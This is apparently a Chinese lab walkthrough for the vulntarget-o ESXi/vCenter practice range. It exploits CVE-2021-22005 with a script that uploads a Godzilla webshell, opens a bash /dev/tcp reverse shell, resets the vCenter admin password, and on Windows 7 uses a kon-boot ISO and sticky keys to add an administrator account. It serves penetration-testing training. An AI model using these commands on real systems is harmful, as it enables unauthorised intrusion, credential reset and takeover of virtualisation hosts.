vmware-esxi-vscenter-靶场vulntarget-o #
https://pan.baidu.com/s/1sv9qdioNF4PTUliix5HEfg提取码: 2dwq 下载靶场
WP 靶机WP
安装配置 #
ESXi 是 VMware 的裸金属虚拟化 hypervisor(直接安装在物理服务器硬件上),核心功能是创建、运行和管理虚拟机;vCenter Server 是集中管理平台,用于统一管控多台 ESXi 主机及上面的所有虚拟机,实现规模化运维。 这个靶机相当于在一个主机里面创建了两个虚拟机 攻击他的vxcenter相当于拿到了堡垒机进行跳板
就和阿里云的面板相似
设置为NAT模式 设置网段为10
打开配置
启动虚拟机
相关密码
esxi :192.168.10.128 进入后启动PC vcenter和win7
● 账号:root
● 密码:Vulntarget@123
vcenter:192.168.10.129
● 账号:administrator@vsphere.local
● 密码:Admin@vulntarget123
Windows7:192.168.10.*(dhcp)
● 账号:vulntarget
● 密码:Vulntarget
https://192.168.10.129/访问后启动客户端
渗透测试 #
这种面板就和阿里的一样点击画面就进去了可以操作
发现了vcenter客户端
cve-2021-22005 #
使用cve-2021-22005-exp-main
来一个哥斯拉后门
python exp.py -s 11.jsp -t https://192.168.10.129/
[*] target: https://192.168.10.129
[*] webshell: 11.jsp
[*] creating agent
[*] uploading manifest
[!] webshell url: https://192.168.10.129/idm/..;/tgpz9j.jsp
自动生成payload哥斯拉连接
webshell是没有交互的 反弹个shell来
bash -i >& /dev/tcp/192.168.10.1/6666 0>&1 反弹SHELL
nc -lvvp 6666
listening on [any] 6666 ...
192.168.10.129: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [192.168.10.1] from (UNKNOWN) [192.168.10.129] 35096: NO_DATA
bash: cannot set terminal process group (1747): Inappropriate ioctl for device
bash: no job control in this shell
whoami
root
重置vcenter密码 这个不推荐 可以看上面那个社区其他攻击方法
/usr/lib/vmware-vmdir/bin/vdcadmintool 重置密码
Please enter account UPN : administrator@vsphere.local
==================
Please select:
0. exit
1. Test LDAP connectivity
2. Force start replication cycle
3. Reset account password
4. Set log level and mask
5. Set vmdir state
6. Get vmdir state
7. Get vmdir log level and mask
==================
New password is -
qx[cKy5r@0-OP+p{Xw'@ 拿到密码登录
进入VCENTER #
进入后我们要拿下这个win7可以上传恶意的iso镜像来达成-使用克隆虚拟机
VMware vSphere Client 环境下克隆的虚拟机不需要本机启动就能启动,是因为虚拟机本身具备相对独立性
先上传到数据库中 kon-bootCD.iso
再克隆
选中自定义
选中镜像 去掉网络避免冲突
强制进入bios
启动之后,在bios界面,使用+-符号来移动顺序,mac上只能用-来移动,将cd作为第一个,然后f10保存即可
进入登录界面按5下shift
默认system权限
net user admin33 admin33 /add 账号admin33 密码admin33
net localgroup administrators admin33 /add 将新创建的用户 admin33 添加到 管理员组(administrators)